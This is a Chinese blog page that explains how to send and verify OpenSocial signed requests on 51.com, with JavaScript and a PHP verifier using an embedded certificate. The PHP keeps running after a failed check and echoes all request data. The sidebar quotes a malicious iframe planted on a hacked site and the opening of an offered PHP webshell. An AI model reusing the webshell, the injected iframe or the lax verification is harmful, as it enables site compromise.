在51.com上如何编写SIGNED REQUEST--通用其他OS平台

最新推荐文章于 2022-10-03 21:34:56 发布
最新推荐文章于 2022-10-03 21:34:56 发布
阅读量884 收藏
点赞数
分类专栏: opensocial 文章标签: os server debugging null parameters 服务器

原文链接:http://blog.xiaonei.com/GetEntry.do?id=380771921&owner=253723720

 

首先到51去申请一个OPENSOCIAL JS应用,这个流程这里就不提了,大家已经很熟悉了。

然后写我们的SIGNED REQUEST请求,这样的请求有利于我们开发者的服务器不会被除container的其他服务器发送的请求干扰。

 

这里面有一个实例,我们可以去看一下:http://apps.51.com/os_test。

这里是他的xml地址:http://www.unickway.org.cn/opensocial/xml/xml/test/test_xml/ostest.xml

下面是我们的js端的代码:(很简单)。

<code>

    var server_url = 'http://www.unickway.org.cn/opensocial/xml/xml/test/test_php/signed_request.php';   //这是要请求的我服务器上的URL 
    var params = {};                          //我要发送的参数 
    params[gadgets.io.RequestParameters.AUTHORIZATION] = gadgets.io.AuthorizationType.SIGNED; //叫CONTAINER进行加密发送,最主要的:) 
    params[gadgets.io.RequestParameters.CONTENT_TYPE] = gadgets.io.ContentType.JSON;
    gadgets.io.makeRequest(server_url,function(data){response(data.text);},params);         //发送请求,并在response函数接受请求 
</code> 

下面是我们的server端的代码:(也很简单,这里会用到shindig中的一个OAUTH.php,具体目录是shindig/php/src/gadgets/oauth/oauth.php,一定要用这个文件,其他的oauth.php不好用的:) )

<code>

<?php
   require_once("OAuth.php");

   class FOSignatureMethod extends OAuthSignatureMethod_RSA_SHA1 {
     protected function fetch_public_cert(&$request) {
       return <<<EOD
-----BEGIN CERTIFICATE-----
MIICxTCCAi6gAwIBAgIJAKGu1p8ZX0ClMA0GCSqGSIb3DQEBBQUAMEwxCzAJBgNV
BAYTAkdCMRIwEAYDVQQIEwlCZXJrc2hpcmUxEDAOBgNVBAcTB05ld2J1cnkxFzAV
BgNVBAoTDk15IENvbXBhbnkgTHRkMB4XDTA4MTAxNzAyMDkwNloXDTA5MTAxNzAy
MDkwNlowTDELMAkGA1UEBhMCR0IxEjAQBgNVBAgTCUJlcmtzaGlyZTEQMA4GA1UE
BxMHTmV3YnVyeTEXMBUGA1UEChMOTXkgQ29tcGFueSBMdGQwgZ8wDQYJKoZIhvcN
AQEBBQADgY0AMIGJAoGBAMLJ0Jcel8Jnw3dG4vUp7uOiBtRhShUEKD8wXSbjT/H4
vP6Np0wSBE1II0D4rmA6+LEJQp6II+35lnx3QZ4Fwknxg0EsHDrJHxmz47+Jdebg
KHwkdLteubzshqOD0DKpwIvp+tVdmtV9ThAk1k2La7y+O2qEZLnhpMPMh7rtWXc5
AgMBAAGjga4wgaswHQYDVR0OBBYEFK2mxQW2Zilj6YK/Jd8iEOio62tuMHwGA1Ud
IwR1MHOAFK2mxQW2Zilj6YK/Jd8iEOio62tuoVCkTjBMMQswCQYDVQQGEwJHQjES
MBAGA1UECBMJQmVya3NoaXJlMRAwDgYDVQQHEwdOZXdidXJ5MRcwFQYDVQQKEw5N
eSBDb21wYW55IEx0ZIIJAKGu1p8ZX0ClMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcN
AQEFBQADgYEAL9baSkA4jw+FL5Aq7xDR7aAoDu6qKT3wRgpmSQl9vL0SatncDdio
JpfAnENN3g4M/MABt0B1qOd7r1rK+ymbmszficRyb5v0Z8n/60fIg42YHygV+wFa
wcf4VXqAQ+lCpCosqgi30XDJXNECMx1kHf7NUtNacJpxHhJ+6swqErc=
-----END CERTIFICATE-----
EOD;
     }
   }
   //上面的 public_cert下载地址为: http://os.51.com/public.cer ,用来验证contianer给我们的信息,不同的container下载不同的public cert文件,你也可以不下载直接用网路上的文件:) 
   //Build a request object from the current request
   $request = OAuthRequest::from_request(null, null, array_merge($_GET, $_POST));

   //Initialize the new signature method
   $signature_method = new FOSignatureMethod();

   //Check the request signature
   @$signature_valid = $signature_method->check_signature($request, null, null, $_GET["oauth_signature"]);
   //上面这句代码就是去验证,是否我们想要的CONTAINER发送过来的信息:) 
   //Build the output object
   $payload = array();
   if ($signature_valid == true) { //这里是TRUE,说明验证成功了。 
     $payload["validated"] = "Success! The data was validated";
   } else {  // 失败:(,那我们就不叫他继续运行我们的程序了,屏蔽 
     $payload["validated"] = "This request was spoofed";
   }

   //Add extra parameters to help debugging
   $payload["get"] = $_GET;
   $payload["post"] = $_POST;
   $payload["rawpost"] = file_get_contents("php://input");

   //Return the response as JSON
   echo var_export($payload);
?>

</code>

 

这里我们在js端发送一个验证过的请求,到我们(应用本身)的SERVER端验证请求的正确性,就完成了。

 

本代码版权吴伊自所有,我这里纯属抄袭:)

chinaopensocial
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
59.第十四章 加密和安全 -- OpenSSL(三)
Raymond的博客
01-31 311
2.OpenSSL 2.1 OpenSSL 介绍 官网:https://www.openssl.org/ OpenSSL计划在1998年开始,其目标是发明一套自由的加密工具,在互联网上使用。OpenSSL以EricYoung以及Tim Hudson两人开发的SSLeay为基础,随着两人前往RSA公司任职,SSLeay在1998年12月停止开发。因此在1998年12月,社群另外分支出OpenSSL,继续开发下去 OpenSSL管理委员会当前由7人组成有13个开发人员具有提交权限(其中许多人也是OpenSSL管
GOOGLE Gadgets 处理远程内容,如何提取和控制远程文本(通常为 HTML)、XML、JSON 和 RSS/Atom 供稿数据。
11-25 2010
 小工具提供的最令人振奋的一个功能是能以新方式组合多个源中的信息,或提供备用方式与现有信息进行交互。小工具 API 使您的小工具可以远程提取其他网络服务器和网页的内容并对其进行操作。小工具 API 提供了 makeRequest(url, callback, opt_params) 函数以进行检索和操作远程网络内容。该函数将使用以下参数:String url - 存放内
http://mail.163.com/help/help_spam_16.htm?ip=118.186.207.7&hostid=smtp5&time=1358341921
热门推荐
云计算?
01-16 71万+
0INRMumLsiQwT0xVgvYVmNCBWS7mV8LzSeLOZGHzflL3ziBSx+iej3G1syAeYvPZxqagQ0P7mgdX /qgnEWWuIcv4cTR6ZI5QNmqULAGtRkCtCNsphAD7cLBiV7UpV7yvURpKw6H8jHyDDZc8zP5P8QF9 abbRoeoTcPcDs/Ij0+JSX9fkdkqCvmUFYzy/GBb+hMWJ...
IP138.com被人挂马
weixin_34342207的博客
10-09 3349
[url]www.ip138.com[/url]网站被人挂马。       28.htm内容如下:  &lt;br&gt;&lt;br&gt;&lt;Iframe src="[url]http://zlwrnm1.cn/a254/fxx.htm[/url]" width=100 height=0&gt;&lt;/Iframe&gt;&lt;br&gt;&lt;br&gt;&lt;br
signature=1a4f4cc2a4cb36682d90c0d4c84ca5da,dweb-mirror/yarn.lock at master · internetarchive/dweb-mi...
weixin_34615710的博客
05-29 10万+
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/code-frame@^7.0.0", "@babel/code-frame@^7.8.3":version "7.8.3"resolved "https://registry.yarnpkg.com/@babel/co...
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 1795
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
爬虫教程( 1 ) --- 初级、基础、实践
墨鱼菜鸡
07-11 2975
爬虫教程:https://piaosanlang.gitbooks.io/spiders/content/ 如何入门 Python 爬虫:https://zhuanlan.zhihu.com/p/21479334 静觅 崔庆才的个人博客 Python 爬虫系列:http://cuiqingcai.com/category/technique/pyth...
Nginx基础之错误页面配置/流量控制/访问控制/变量/监控/HTTPS配置/性能优化
weixin_43136091的博客
06-10 4万+
16、nginx 错误页面配置 nginx错误页面包括404 403 500 502 503 504等页面,只需要在server中增加以下配置即可: error_page 404 403 500 502 503 504 /404.html; location = /404.html { root /usr/local/nginx/html; } 注意: /usr/local/ng
Golang优秀开源项目汇总, 10大流行Go语言开源项目, golang 开源项目全集(golang/go/wiki/Projects), GitHub上优秀的Go开源项目...
weixin_33836874的博客
05-08 1万+
  Golang优秀开源项目汇总(持续更新。。。)我把这个汇总放在github上了, 后面更新也会在github上更新。 https://github.com/hackstoic/golang-open-source-projects  。 欢迎fork, star , watch, 提issue。    资料参考来源:http://studygolang.com/projects 监控...
Google gadgets 处理远程内容
12-24 881
处理不同的 Content 类型 处理文本处理 XML处理供稿处理 JSON 设置授权类型方法GETPOST 刷新缓存  处理文本 function getContacts() { var params = {}; pa
chrome 书签
weixin_30732487的博客
03-27 10万+
<!DOCTYPE NETSCAPE-Bookmark-file-1> <!-- This is an automatically generated file. It will be read and overwritten. DO NOT EDIT! --> <META HTTP-EQUIV="Content-Type" ...
送一个大马给有需要的人,请不要做非法之事
qq_42966617的博客
06-16 8万+
今天站点被人爆破,并成功入马,现在把马放出来,给有需要的人。 <?php header("Content-type:text/html;charset=gbk"); $password='fool'; $shellname='MrFooL'; $myurl=null; error_reporting(0); ob_start(); define('myaddress',$_SERVER['SCRIPT_FILENAME']); define('postpass',$password); define(
signature=f858aee57ce8e7dd6049cb7a67e88759,jdk8u/jdk8u/jdk: 8d39522b0f75
weixin_34447182的博客
05-30 13万+
--- a/make/CopyFiles.gmkMon Nov 23 15:02:19 2015 -0800+++ b/make/CopyFiles.gmkMon Feb 03 06:25:04 2020 +0000@@ -1,5 +1,5 @@#-# Copyright (c) 2011, 2016, Oracle and/or its affiliates. All rights reserv...
Facebook接入(新)--iframe方式
常城的专栏
07-25 1万+
本文介绍如何把您的应用接入facebook。比如获取facebook ID,头像,好友。本文对应2011年7月25日的Facebook API。
3-3:HTTP协议之request和respond及常见请求方法和常见状态码
快乐江湖的博客
07-13 1288
文章目录一:request(1)请求报文基本构成(2)请求方法二:respond(1)响应报文基本构成(2)HTTP常见状态码三:HTTP常见Header(字段) 注意下面需要分析请求报头和响应报头的构成,需要使用到抓包工具,推荐使用fillder 一:request (1)请求报文基本构成 在浏览器中输入百度的网址,选中相应数据,右侧显示中上半部分为请求报头,下半部分显示为相应报头,点击raw(原始数据)查看 信息具体如下 GET https://www.baidu.com/ HTTP/1.1 #
封装一个OCSPRequest结构体请求(signedReq)
爱java的小蓝的博客
03-13 1505
按照OCSPRequest的请求语法,参照OCSP在线证书状态协议封装一个不含签名的请求signedReq串。 代码: package com.xdja.asn1; import org.bouncycastle.asn1.*; import org.bouncycastle.asn1.ocsp.CertID; import org.bouncycastle.asn1.ocsp.OCSPR...
Failed to connect to 192.168.10.223:1433 - self signed certificate
最新发布
07-17
这个错误表示在尝试连接到 IP 地址为 192.16810.223、端口号为 1433 的 SQL Server 时,出现了自签名证书的问题。自签名证书是由服务器自行生成的,而不是由受信任的第三方机构颁发的证书。 如果你信任这个服务器,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值